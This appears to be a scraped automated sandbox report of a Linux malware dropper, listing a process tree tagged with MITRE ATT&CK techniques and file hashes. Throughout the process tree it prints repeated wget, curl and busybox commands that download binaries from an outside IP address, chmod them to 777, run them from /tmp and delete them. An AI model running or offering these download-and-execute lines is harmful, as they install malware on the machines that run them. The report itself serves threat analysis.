/bin/busybox/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:1639
-
-
/bin/chmodchmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1641
-
-
/bin/rmrm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:1642
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:1645
-
-
/bin/chmodchmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:1651
-
-
/bin/chmodchmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:1657
-
-
/bin/chmodchmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:1663
-
-
/bin/chmodchmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:1669
-
-
/bin/chmodchmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:1672
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97